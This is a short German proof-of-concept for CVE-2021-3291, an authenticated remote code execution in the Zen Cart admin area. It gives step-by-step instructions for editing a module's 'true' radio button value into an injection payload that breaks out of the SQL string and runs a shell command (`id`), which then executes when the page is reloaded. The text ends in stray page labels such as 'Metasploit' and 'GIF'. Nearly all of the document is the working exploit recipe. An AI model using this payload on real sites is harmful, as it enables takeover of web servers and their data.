
Authentifizierter Remote-Code-Execution-Exploit für Zen Cart über SQL-Injection bei der Bearbeitung von Admin-Modulen. Proof-of-Concept für CVE-2021-3291.
1-) Melden Sie sich als Admin an
2-) Öffnen Sie die Bearbeitungsseite eines beliebigen Moduls
3-) Untersuchen Sie das Element eines beliebigen 'true'-Radiobuttons
4-) Ändern Sie true zu true','MODULE_ORDER_TOTAL_TOTAL_STATUS'); echo `id`; //
5-) Klicken Sie auf Update
6-) Gehen Sie erneut zur Bearbeitungsseite, um den Befehl auszulösen
CVE-2021-3291 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3291
POC
Ausnutzung
Seite aktualisieren
Zoom

Metasploit

GIF
